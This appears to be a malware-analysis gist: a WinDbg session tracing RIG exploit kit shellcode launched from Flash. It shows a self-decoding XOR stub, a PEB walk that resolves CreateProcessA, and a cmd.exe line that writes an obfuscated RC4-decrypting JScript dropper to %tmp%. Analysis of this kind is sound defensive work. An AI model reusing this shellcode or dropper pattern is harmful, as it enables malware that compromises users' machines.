@brad-anton
Created January 11, 2017 16:11
Rig ROP Chain
0:013> bp KERNEL32!CreateProcessAStub
0:022> g
Breakpoint 0 hit
eax=00000000 ebx=7717eb70 ecx=00000000 edx=77244048 esi=00000011 edi=04d3b330
eip=7717eb70 esp=04d3b2b4 ebp=04d3b340 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
KERNEL32!CreateProcessAStub:
7717eb70 8bff mov edi,edi
0:005> da poi(esp+8)
116f00b2 "cmd.exe /q /c cd /d "%tmp%" && e"
116f00d2 "cho function O(n,g){for(var c=0,"
116f00f2 "s=String,d,D="pu"+"sh",b=[],i=[]"
116f0112 ",r=255,a=0;r+1^>a;a++)b[a]=a;for"
116f0132 "(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%"
116f0152 "g.length)^&r,d=b[a],b[a]=b[c],b["
116f0172 "c]=d;for(var e=c=a=0,S="fromChar"
116f0192 "Code";e^<n.length;e++)a=a+1^&r,c"
116f01b2 "=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]"
116f01d2 "=d,i[D](s[S](n[v](e)^^b[b[a]+b[c"
116f01f2 "]^&r]));return i[u(15)](u(11))};"
116f0212 "function H(g){var T=u(0),d=W(T+""
0:005> k
ChildEBP RetAddr
04d3b2b0 116f00a2 KERNEL32!CreateProcessAStub
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\System32\Macromed\Flash\Flash.ocx -
WARNING: Frame IP not in any known module. Following frames may be wrong.
04d3b340 52a3baf1 0x116f00a2
0:005> u 0x116f0000
116f0000 eb12 jmp 116f0014
116f0002 58 pop eax
116f0003 31c9 xor ecx,ecx
116f0005 66b96d05 mov cx,56Dh
116f0009 49 dec ecx
116f000a 80340884 xor byte ptr [eax+ecx],84h
116f000e 85c9 test ecx,ecx
116f0010 75f7 jne 116f0009
116f0012 ffe0 jmp eax
116f0014 e8e9ffffff call 116f0002
116f0019 55 push ebp
116f001a 89e5 mov ebp,esp
116f001c 83c4ac add esp,0FFFFFFACh
116f001f 53 push ebx
116f0020 51 push ecx
116f0021 57 push edi
116f0022 31c0 xor eax,eax
116f0024 648b4030 mov eax,dword ptr fs:[eax+30h]
116f0028 8b400c mov eax,dword ptr [eax+0Ch]
116f002b 8b400c mov eax,dword ptr [eax+0Ch]
116f002e 8b00 mov eax,dword ptr [eax]
116f0030 8b00 mov eax,dword ptr [eax]
116f0032 8b5818 mov ebx,dword ptr [eax+18h]
116f0035 89d8 mov eax,ebx
116f0037 03403c add eax,dword ptr [eax+3Ch]
116f003a 8b5078 mov edx,dword ptr [eax+78h]
116f003d 01da add edx,ebx
116f003f 8b7a20 mov edi,dword ptr [edx+20h]
116f0042 01df add edi,ebx
116f0044 31c9 xor ecx,ecx
116f0046 8b07 mov eax,dword ptr [edi]
116f0048 01d8 add eax,ebx
116f004a 813843726561 cmp dword ptr [eax],61657243h
116f0050 751c jne 116f006e
116f0052 81780b73734100 cmp dword ptr [eax+0Bh],417373h
116f0059 7513 jne 116f006e
116f005b 8b4224 mov eax,dword ptr [edx+24h]
116f005e 01d8 add eax,ebx
116f0060 0fb70448 movzx eax,word ptr [eax+ecx*2]
116f0064 8b521c mov edx,dword ptr [edx+1Ch]
116f0067 01da add edx,ebx
116f0069 031c82 add ebx,dword ptr [edx+eax*4]
116f006c eb09 jmp 116f0077
116f006e 83c704 add edi,4
116f0071 41 inc ecx
116f0072 3b4a18 cmp ecx,dword ptr [edx+18h]
116f0075 7ccf jl 116f0046
116f0077 8d45f0 lea eax,[ebp-10h]
116f007a 50 push eax
116f007b 8d7dac lea edi,[ebp-54h]
116f007e 57 push edi
116f007f 31c0 xor eax,eax
116f0081 b911000000 mov ecx,11h
116f0086 f3ab rep stos dword ptr es:[edi]
116f0088 66c745d80101 mov word ptr [ebp-28h],101h
116f008e c745ac44000000 mov dword ptr [ebp-54h],44h
116f0095 50 push eax
116f0096 50 push eax
116f0097 50 push eax
116f0098 40 inc eax
116f0099 50 push eax
116f009a 48 dec eax
116f009b 50 push eax
116f009c 50 push eax
116f009d eb0e jmp 116f00ad
116f009f 50 push eax
116f00a0 ffd3 call ebx ; KERNEL32!CreateProcessAStub
116f00a2 5f pop edi
116f00a3 59 pop ecx
116f00a4 5b pop ebx
116f00a5 c1e003 shl eax,3
116f00a8 83c006 add eax,6
116f00ab c9 leave
116f00ac c3 ret
116f00ad e8edffffff call 116f009f